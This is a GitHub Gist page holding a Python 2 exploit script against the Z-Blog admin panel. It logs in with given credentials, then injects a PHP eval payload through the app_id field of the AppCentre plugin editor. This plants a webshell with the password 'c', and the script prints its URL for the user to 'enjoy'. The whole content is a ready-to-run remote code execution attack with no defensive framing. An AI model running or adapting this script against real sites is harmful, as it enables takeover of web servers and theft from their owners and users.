Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
ZBlog Background Getshell Exploit
#!/usr/bin/env python
# encoding:utf-8
# zblog-background-getshell-exploit
# Author : Shutdown_r & WangYihang
import requests
import hashlib
import sys
import string
prefix = "image"
webshell_password = "c"
filename = "update.php"
session = requests.Session()
def check_prefix(prefix):
allow_chars = string.letters + string.digits
if len(prefix) < 3:
print "[-] The length of 'prefix' must > 3"
return False
for i in prefix:
if i not in allow_chars:
print "[-] The prefix must be [a-zA-Z0-9]"
return False
return True
def md5(content):
return hashlib.md5(content).hexdigest()
def login(host, port, username, password):
url = "http://%s:%d/zb_system/cmd.php?act=verify" % (host, port)
data = {
"username": username,
"password": md5(password),
}
response = session.post(url, data=data)
content = response.content
return "后台首页" in content
def exploit(host, port):
url = "http://%s:%d/zb_users/plugin/AppCentre/plugin_edit.php" % (
host, port)
data = {
"app_id": "%s'.eval($_REQUEST[%s]).'" % (prefix, webshell_password),
"app_path": filename,
}
response = session.post(url, data=data)
content = response.content
if "已存在同名的APP应用" in content:
print "[-] PlugIn name has been used! Please change the prefix!"
return False
elif len(content) == 0:
return True
else:
print "[-] Unknown error!"
return False
def main():
if len(sys.argv) != 5:
print "Usage : "
print "\tpython %s [HOST] [PORT] [USERNAEM] [PASSWORD]" % (sys.argv[0])
print "Examplt : "
print "\tpython exploit.py 127.0.0.1 80 admin admin"
print "Script Author : "
print "\tWangYihang<wangyihanger@gmail.com>"
print "vulnerability Author : "
print "\tShutdown-r"
exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]
if not check_prefix(prefix):
exit(2)
webshell_url = "http://%s:%d/zb_users/plugin/%s'.eval($_REQUEST[%s]).'/%s" % (host, port, prefix, webshell_password, filename)
if not login(host, port, username, password):
print "[-] Login failed!"
print "[-] Please check your username and password"
exit(3)
print "[+] Login success!"
print "[+] Starting exploit..."
if exploit(host, port):
print "[+] Exploit success!"
print "[+] Enjoy your shell :"
print "[+] Url : %s" % (webshell_url)
print "[+] Pas : c"
print "[+] Remember to die() it!"
else:
print "[-] Exploit failed!"
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.